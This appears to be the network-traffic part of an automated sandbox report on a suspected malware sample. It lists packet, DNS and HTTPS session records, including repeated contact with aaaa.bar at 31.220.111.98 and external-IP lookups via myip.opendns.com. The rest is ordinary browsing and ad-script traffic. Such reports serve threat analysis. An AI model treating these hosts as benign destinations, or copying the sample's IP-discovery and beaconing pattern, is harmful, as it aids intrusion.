Oct 20, 2021 15:12:22.774642944 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.790515900 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.790565014 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:24.508604050 CEST | 49972 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:24.508652925 CEST | 443 | 49972 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:24.508747101 CEST | 49972 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:24.509975910 CEST | 49972 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:24.509994030 CEST | 443 | 49972 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:24.627744913 CEST | 443 | 49972 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:24.627888918 CEST | 49972 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:24.655491114 CEST | 49972 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:24.655512094 CEST | 443 | 49972 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:24.672024965 CEST | 49972 | 443 | 192.168.2.5 | 31.220.111.98
                                                              Oct 20, 2021 15:12:24.672054052 CEST4434997231.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:25.154757977 CEST4434997231.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:25.154792070 CEST4434997231.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:25.154879093 CEST4434997231.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:25.161797047 CEST49972443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:25.170002937 CEST49972443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:25.170033932 CEST4434997231.220.111.98192.168.2.5

                                                              UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 20, 2021 15:08:30.124794960 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:08:34.783061028 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:08:35.327625990 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:08:35.347404957 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:08:35.864444971 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:08:35.886532068 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:08:38.127250910 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:08:38.147479057 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:08:38.603321075 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:08:38.624269009 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:08:40.389971972 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:08:42.134711981 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:08:42.155055046 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:08:50.150769949 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:08:50.176003933 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:08:50.207711935 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:08:50.230431080 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:08:51.055684090 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:08:55.795512915 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:08:55.814032078 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:10:41.611599922 CEST | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:10:41.696527004 CEST | 53 | 59261 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:10:48.063822031 CEST | 53 | 57151 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:10:54.487529039 CEST | 53 | 59413 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:12:01.904071093 CEST | 56432 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:12:01.930294037 CEST | 53 | 56432 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:12:02.095237970 CEST | 52929 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:12:02.116945028 CEST | 53 | 52929 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:12:08.391160011 CEST | 64317 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:12:08.409462929 CEST | 53 | 64317 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:12:14.814949036 CEST | 56895 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:12:14.839359999 CEST | 53 | 56895 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:12:39.636048079 CEST | 57515 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:12:39.637876987 CEST | 58199 | 53 | 192.168.2.5 | 8.8.8.8
Oct 20, 2021 15:12:39.655416965 CEST | 53 | 57515 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:12:39.655639887 CEST | 53 | 58199 | 8.8.8.8 | 192.168.2.5
Oct 20, 2021 15:12:39.658279896 CEST | 58200 | 53 | 192.168.2.5 | 208.67.222.222
Oct 20, 2021 15:12:39.660295963 CEST | 58201 | 53 | 192.168.2.5 | 208.67.222.222
Oct 20, 2021 15:12:39.674038887 CEST | 53 | 58200 | 208.67.222.222 | 192.168.2.5
Oct 20, 2021 15:12:39.675090075 CEST | 58202 | 53 | 192.168.2.5 | 208.67.222.222
Oct 20, 2021 15:12:39.675980091 CEST | 53 | 58201 | 208.67.222.222 | 192.168.2.5
Oct 20, 2021 15:12:39.676615000 CEST | 58203 | 53 | 192.168.2.5 | 208.67.222.222
Oct 20, 2021 15:12:39.690810919 CEST | 53 | 58202 | 208.67.222.222 | 192.168.2.5
Oct 20, 2021 15:12:39.692991972 CEST | 53 | 58203 | 208.67.222.222 | 192.168.2.5
Oct 20, 2021 15:12:39.697055101 CEST | 58204 | 53 | 192.168.2.5 | 208.67.222.222
Oct 20, 2021 15:12:39.697527885 CEST | 58205 | 53 | 192.168.2.5 | 208.67.222.222
Oct 20, 2021 15:12:39.712977886 CEST | 53 | 58204 | 208.67.222.222 | 192.168.2.5
Oct 20, 2021 15:12:39.713160992 CEST | 53 | 58205 | 208.67.222.222 | 192.168.2.5
Oct 20, 2021 15:12:39.970794916 CEST | 53 | 65221 | 8.8.8.8 | 192.168.2.5

                                                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 20, 2021 15:08:30.124794960 CEST | 192.168.2.5 | 8.8.8.8 | 0x9bed | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:34.783061028 CEST | 192.168.2.5 | 8.8.8.8 | 0x9bf0 | Standard query (0) | web.vortex.data.msn.com | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:35.327625990 CEST | 192.168.2.5 | 8.8.8.8 | 0x4079 | Standard query (0) | contextual.media.net | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:35.864444971 CEST | 192.168.2.5 | 8.8.8.8 | 0x8e2a | Standard query (0) | geolocation.onetrust.com | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:38.127250910 CEST | 192.168.2.5 | 8.8.8.8 | 0x427 | Standard query (0) | hblg.media.net | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:38.603321075 CEST | 192.168.2.5 | 8.8.8.8 | 0x2333 | Standard query (0) | lg3.media.net | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:40.389971972 CEST | 192.168.2.5 | 8.8.8.8 | 0x8204 | Standard query (0) | cvision.media.net | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:42.134711981 CEST | 192.168.2.5 | 8.8.8.8 | 0x5b7b | Standard query (0) | btloader.com | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:50.150769949 CEST | 192.168.2.5 | 8.8.8.8 | 0xb143 | Standard query (0) | ad.doubleclick.net | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:50.207711935 CEST | 192.168.2.5 | 8.8.8.8 | 0xd300 | Standard query (0) | ad-delivery.net | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:51.055684090 CEST | 192.168.2.5 | 8.8.8.8 | 0x4857 | Standard query (0) | srtb.msn.com | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:55.795512915 CEST | 192.168.2.5 | 8.8.8.8 | 0xd38f | Standard query (0) | img.img-taboola.com | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:01.904071093 CEST | 192.168.2.5 | 8.8.8.8 | 0xabcb | Standard query (0) | aaaa.bar | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:02.095237970 CEST | 192.168.2.5 | 8.8.8.8 | 0x7101 | Standard query (0) | aaaa.bar | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:08.391160011 CEST | 192.168.2.5 | 8.8.8.8 | 0xbb42 | Standard query (0) | aaaa.bar | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:14.814949036 CEST | 192.168.2.5 | 8.8.8.8 | 0x3bf8 | Standard query (0) | aaaa.bar | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:39.636048079 CEST | 192.168.2.5 | 8.8.8.8 | 0x8546 | Standard query (0) | resolver1.opendns.com | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:39.637876987 CEST | 192.168.2.5 | 8.8.8.8 | 0x1e25 | Standard query (0) | resolver1.opendns.com | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:39.658279896 CEST | 192.168.2.5 | 208.67.222.222 | 0x1 | Standard query (0) | 222.222.67.208.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Oct 20, 2021 15:12:39.660295963 CEST | 192.168.2.5 | 208.67.222.222 | 0x1 | Standard query (0) | 222.222.67.208.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Oct 20, 2021 15:12:39.675090075 CEST | 192.168.2.5 | 208.67.222.222 | 0x2 | Standard query (0) | myip.opendns.com | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:39.676615000 CEST | 192.168.2.5 | 208.67.222.222 | 0x2 | Standard query (0) | myip.opendns.com | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:39.697055101 CEST | 192.168.2.5 | 208.67.222.222 | 0x3 | Standard query (0) | myip.opendns.com | 28 | IN (0x0001)
Oct 20, 2021 15:12:39.697527885 CEST | 192.168.2.5 | 208.67.222.222 | 0x3 | Standard query (0) | myip.opendns.com | 28 | IN (0x0001)

                                                              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 20, 2021 15:08:30.142769098 CEST | 8.8.8.8 | 192.168.2.5 | 0x9bed | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
Oct 20, 2021 15:08:34.812608957 CEST | 8.8.8.8 | 192.168.2.5 | 0x9bf0 | No error (0) | web.vortex.data.msn.com | web.vortex.data.microsoft.com | | CNAME (Canonical name) | IN (0x0001)
Oct 20, 2021 15:08:35.347404957 CEST | 8.8.8.8 | 192.168.2.5 | 0x4079 | No error (0) | contextual.media.net | | 23.211.6.95 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:35.886532068 CEST | 8.8.8.8 | 192.168.2.5 | 0x8e2a | No error (0) | geolocation.onetrust.com | | 104.20.184.68 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:35.886532068 CEST | 8.8.8.8 | 192.168.2.5 | 0x8e2a | No error (0) | geolocation.onetrust.com | | 104.20.185.68 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:38.147479057 CEST | 8.8.8.8 | 192.168.2.5 | 0x427 | No error (0) | hblg.media.net | | 23.211.6.95 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:38.624269009 CEST | 8.8.8.8 | 192.168.2.5 | 0x2333 | No error (0) | lg3.media.net | | 23.211.6.95 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:40.407922983 CEST | 8.8.8.8 | 192.168.2.5 | 0x8204 | No error (0) | cvision.media.net | cvision.media.net.edgekey.net | | CNAME (Canonical name) | IN (0x0001)
Oct 20, 2021 15:08:42.155055046 CEST | 8.8.8.8 | 192.168.2.5 | 0x5b7b | No error (0) | btloader.com | | 104.26.7.139 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:42.155055046 CEST | 8.8.8.8 | 192.168.2.5 | 0x5b7b | No error (0) | btloader.com | | 104.26.6.139 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:42.155055046 CEST | 8.8.8.8 | 192.168.2.5 | 0x5b7b | No error (0) | btloader.com | | 172.67.70.134 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:50.176003933 CEST | 8.8.8.8 | 192.168.2.5 | 0xb143 | No error (0) | ad.doubleclick.net | dart.l.doubleclick.net | | CNAME (Canonical name) | IN (0x0001)
Oct 20, 2021 15:08:50.176003933 CEST | 8.8.8.8 | 192.168.2.5 | 0xb143 | No error (0) | dart.l.doubleclick.net | | 172.217.168.38 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:50.230431080 CEST | 8.8.8.8 | 192.168.2.5 | 0xd300 | No error (0) | ad-delivery.net | | 104.26.3.70 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:50.230431080 CEST | 8.8.8.8 | 192.168.2.5 | 0xd300 | No error (0) | ad-delivery.net | | 172.67.69.19 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:50.230431080 CEST | 8.8.8.8 | 192.168.2.5 | 0xd300 | No error (0) | ad-delivery.net | | 104.26.2.70 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:51.086312056 CEST | 8.8.8.8 | 192.168.2.5 | 0x4857 | No error (0) | srtb.msn.com | www.msn.com | | CNAME (Canonical name) | IN (0x0001)
Oct 20, 2021 15:08:51.086312056 CEST | 8.8.8.8 | 192.168.2.5 | 0x4857 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
Oct 20, 2021 15:08:55.814032078 CEST | 8.8.8.8 | 192.168.2.5 | 0xd38f | No error (0) | img.img-taboola.com | tls13.taboola.map.fastly.net | | CNAME (Canonical name) | IN (0x0001)
Oct 20, 2021 15:08:55.814032078 CEST | 8.8.8.8 | 192.168.2.5 | 0xd38f | No error (0) | tls13.taboola.map.fastly.net | | 151.101.1.44 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:55.814032078 CEST | 8.8.8.8 | 192.168.2.5 | 0xd38f | No error (0) | tls13.taboola.map.fastly.net | | 151.101.65.44 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:55.814032078 CEST | 8.8.8.8 | 192.168.2.5 | 0xd38f | No error (0) | tls13.taboola.map.fastly.net | | 151.101.129.44 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:08:55.814032078 CEST | 8.8.8.8 | 192.168.2.5 | 0xd38f | No error (0) | tls13.taboola.map.fastly.net | | 151.101.193.44 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:01.930294037 CEST | 8.8.8.8 | 192.168.2.5 | 0xabcb | No error (0) | aaaa.bar | | 31.220.111.98 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:02.116945028 CEST | 8.8.8.8 | 192.168.2.5 | 0x7101 | No error (0) | aaaa.bar | | 31.220.111.98 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:08.409462929 CEST | 8.8.8.8 | 192.168.2.5 | 0xbb42 | No error (0) | aaaa.bar | | 31.220.111.98 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:14.839359999 CEST | 8.8.8.8 | 192.168.2.5 | 0x3bf8 | No error (0) | aaaa.bar | | 31.220.111.98 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:39.655416965 CEST | 8.8.8.8 | 192.168.2.5 | 0x8546 | No error (0) | resolver1.opendns.com | | 208.67.222.222 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:39.655639887 CEST | 8.8.8.8 | 192.168.2.5 | 0x1e25 | No error (0) | resolver1.opendns.com | | 208.67.222.222 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:39.674038887 CEST | 208.67.222.222 | 192.168.2.5 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Oct 20, 2021 15:12:39.674038887 CEST | 208.67.222.222 | 192.168.2.5 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Oct 20, 2021 15:12:39.674038887 CEST | 208.67.222.222 | 192.168.2.5 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Oct 20, 2021 15:12:39.675980091 CEST | 208.67.222.222 | 192.168.2.5 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Oct 20, 2021 15:12:39.675980091 CEST | 208.67.222.222 | 192.168.2.5 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Oct 20, 2021 15:12:39.675980091 CEST | 208.67.222.222 | 192.168.2.5 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Oct 20, 2021 15:12:39.690810919 CEST | 208.67.222.222 | 192.168.2.5 | 0x2 | No error (0) | myip.opendns.com | | 102.129.143.33 | A (IP address) | IN (0x0001)
Oct 20, 2021 15:12:39.692991972 CEST | 208.67.222.222 | 192.168.2.5 | 0x2 | No error (0) | myip.opendns.com | | 102.129.143.33 | A (IP address) | IN (0x0001)

                                                              HTTP Request Dependency Graph

                                                              • https:
                                                                • geolocation.onetrust.com
                                                                • btloader.com
                                                                • ad-delivery.net
                                                                • ad.doubleclick.net
                                                                • img.img-taboola.com
                                                              • aaaa.bar

                                                              HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49784 | 104.20.184.68 | 443 |

Timestamp | kBytes transferred | Direction | Data
2021-10-20 13:08:35 UTC | 0 | OUT | GET /cookieconsentpub/v1/geo/location HTTP/1.1
    Accept: application/javascript, */*;q=0.8
    Referer: https://www.msn.com/de-ch/?ocid=iehp
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: geolocation.onetrust.com
    Connection: Keep-Alive
2021-10-20 13:08:35 UTC | 0 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Oct 2021 13:08:35 GMT
    Content-Type: text/javascript
    Content-Length: 182
    Connection: close
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Server: cloudflare
    CF-RAY: 6a1279ccae526967-FRA
2021-10-20 13:08:35 UTC | 0 | IN | Data Ascii: jsonFeed({"country":"CH","state":"ZG","stateName":"Zug","zipcode":"6331","timezone":"Europe/Zurich","latitude":"47.19370","longitude":"8.42020","city":"Hunenberg","continent":"EU"});


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49821 | 104.26.7.139 | 443 |

Timestamp | kBytes transferred | Direction | Data
2021-10-20 13:08:42 UTC | 0 | OUT | GET /tag?o=6208086025961472&upapi=true HTTP/1.1
    Accept: application/javascript, */*;q=0.8
    Referer: https://www.msn.com/de-ch/?ocid=iehp
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: btloader.com
    Connection: Keep-Alive
2021-10-20 13:08:42 UTC | 1 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Oct 2021 13:08:42 GMT
    Content-Type: application/javascript
    Content-Length: 10157
    Connection: close
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=1800, must-revalidate
    Etag: "643eb1aad6ba3932ca744b96ffc00048"
    Vary: Origin
    Via: 1.1 google
    CF-Cache-Status: HIT
    Age: 214
    Accept-Ranges: bytes
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rXekkW5gTi%2FA5lu%2FUbkZIA0V299R8U3gevFM6pvQsILGWOKSkrjKdwnSjAH3cMUxNzOU4X6D%2FqmFv1PlaTyG3cvGeawQ7WWDHt8kQcPVb4%2FU3OYgrYBfJlVgywKmpg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 6a1279f47c095c9e-FRA
2021-10-20 13:08:42 UTC | 1 | IN | Data Ascii: !function(){"use strict";function r(e,i,c,l){return new(c=c||Promise)(function(n,t){function o(e){try{r(l.next(e))}catch(e){t(e)}}function a(e){try{r(l.throw(e))}catch(e){t(e)}}function r(e){var t;e.done?n(e.value):((t=e.value)instanceof c?t:new c(functio
2021-10-20 13:08:42 UTC | 2 | IN | Data Ascii: t){return function(e){return function(t){if(a)throw new TypeError("Generator is already executing.");for(;c;)try{if(a=1,r&&(i=2&t[0]?r.return:t[0]?r.throw||((i=r.return)&&i.call(r),0):r.next)&&!(i=i.call(r,t[1])).done)return i;switch(r=0,i&&(t=[2&t[0],i.v
2021-10-20 13:08:42 UTC | 3 | IN | Data Ascii: ||window.document.documentElement).appendChild(e)})}var u,a,d,b,m;u="6208086025961472",a="btloader.com",d="api.btloader.com",b="2.0.2-2-gfdc9054",m="";var o={"msn.com":{"content_enabled":true,"mobile_content_enabled":false,"website_id":"5671737388695552"}
2021-10-20 13:08:42 UTC | 5 | IN | Data Ascii: dexOf(n.toLowerCase()))&&(t=!0,p.websiteID=o[n].website_id,p.contentEnabled=o[n].content_enabled,p.mobileContentEnabled=o[n].mobile_content_enabled);t||((new Image).src="//"+d+"/l?event=unknownDomain&org="+u+"&domain="+e)}(),window.__bt_tag_d={orgID:u,dom
                                                              2021-10-20 13:08:42 UTC6INData Raw: 6e 28 65 29 7b 76 61 72 20 74 3d 63 2e 62 75 6e 64 6c 65 73 5b 65 5d 3b 69 5b 65 5d 3d 7b 6d 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 2b 74 29 29 7d 2c 6f 2b 3d 74 7d 29 7d 76 61 72 20 6c 3d 74 5b 30 5d 3b 69 66 28 6e 75 6c 6c 21 3d 6c 26 26 6c 2e 62 75 6e 64 6c 65 73 29 7b 76 61 72 20 73 3d 6f 2c 75 3d 31 2d 6f 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6c 2e 62 75 6e 64 6c 65 73 29 2e 73 6f 72 74 28 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6c 2e 62 75 6e 64 6c 65 73 5b 65 5d 3b 69 5b 65 5d 3d 7b 6d 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 73 2b 75 2a 61 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74
                                                              Data Ascii: n(e){var t=c.bundles[e];i[e]={min:Math.trunc(100*(+o+0)),max:Math.trunc(100*(+o+0+t))},o+=t})}var l=t[0];if(null!=l&&l.bundles){var s=o,u=1-o;Object.keys(l.bundles).sort().forEach(function(e){var t=l.bundles[e];i[e]={min:Math.trunc(100*(s+u*a)),max:Math.t
                                                              2021-10-20 13:08:42 UTC7INData Raw: 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6f 29 7d 63 61 74 63 68 28 65 29 7b 7d 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 3b 61 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 74 2c 6e 2e 62 75 62 62 6c 65 73 2c 6e 2e 63 61 6e 63 65 6c 61 62 6c 65 2c 6e 2e 64 65 74 61 69 6c 29 2c 77 69 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 61 29 7d 66 3d 7b 7d 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 69 6e 74 72 6e 6c 3d 7b 74 72 61 63 65 49 44 3a 77 2e 74 72 61 63 65 49 44 7d 3b 74 72 79 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 72 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 6e 2c 6f 3b 72 65
                                                              Data Ascii: ndow.dispatchEvent(o)}catch(e){}var a=document.createEvent("CustomEvent");a.initCustomEvent(t,n.bubbles,n.cancelable,n.detail),window.dispatchEvent(a)}f={},window.__bt_intrnl={traceID:w.traceID};try{!function(){r(this,void 0,void 0,function(){var t,n,o;re
                                                              2021-10-20 13:08:42 UTC9INData Raw: 6f 6e 74 65 6e 74 22 29 7c 7c 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 2c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 22 74 72 75 65 22 3d 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 66 6f 72 63 65 4d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 22 29 7c 7c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 29 2c 70 2e 77 65 62 73 69 74 65 49 44 26 26 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 26 26 28 21 28 6e 3d 2f 28 61 6e 64 72 6f 69 64 7c 62 62 5c 64 2b 7c 6d 65 65 67 6f 29 2e 2b 6d 6f 62 69 6c 65 7c 61 76 61 6e 74 67 6f 7c 62 61 64 61 5c 2f 7c 62 6c 61 63 6b 62 65 72 72 79 7c 62 6c 61 7a 65 72 7c 63 6f 6d 70 61 6c 7c 65 6c 61 69 6e 65 7c 66 65 6e 6e 65 63 7c 68 69 70 74 6f 70 7c 69
                                                              Data Ascii: ontent")||p.contentEnabled,p.mobileContentEnabled="true"==localStorage.getItem("forceMobileContent")||p.mobileContentEnabled),p.websiteID&&p.contentEnabled&&(!(n=/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|i
                                                              2021-10-20 13:08:42 UTC10INData Raw: 73 29 7c 6d 6d 65 66 7c 6d 6f 28 30 31 7c 30 32 7c 62 69 7c 64 65 7c 64 6f 7c 74 28 5c 2d 7c 20 7c 6f 7c 76 29 7c 7a 7a 29 7c 6d 74 28 35 30 7c 70 31 7c 76 20 29 7c 6d 77 62 70 7c 6d 79 77 61 7c 6e 31 30 5b 30 2d 32 5d 7c 6e 32 30 5b 32 2d 33 5d 7c 6e 33 30 28 30 7c 32 29 7c 6e 35 30 28 30 7c 32 7c 35 29 7c 6e 37 28 30 28 30 7c 31 29 7c 31 30 29 7c 6e 65 28 28 63 7c 6d 29 5c 2d 7c 6f 6e 7c 74 66 7c 77 66 7c 77 67 7c 77 74 29 7c 6e 6f 6b 28 36 7c 69 29 7c 6e 7a 70 68 7c 6f 32 69 6d 7c 6f 70 28 74 69 7c 77 76 29 7c 6f 72 61 6e 7c 6f 77 67 31 7c 70 38 30 30 7c 70 61 6e 28 61 7c 64 7c 74 29 7c 70 64 78 67 7c 70 67 28 31 33 7c 5c 2d 28 5b 31 2d 38 5d 7c 63 29 29 7c 70 68 69 6c 7c 70 69 72 65 7c 70 6c 28 61 79 7c 75 63 29 7c 70 6e 5c 2d 32 7c 70 6f 28 63 6b 7c
                                                              Data Ascii: s)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|
                                                              2021-10-20 13:08:42 UTC11INData Raw: 72 6e 5b 32 5d 7d 7d 29 7d 29 7d 28 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 28 29 3b 0a
                                                              Data Ascii: rn[2]}})})}()}catch(e){}}();


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
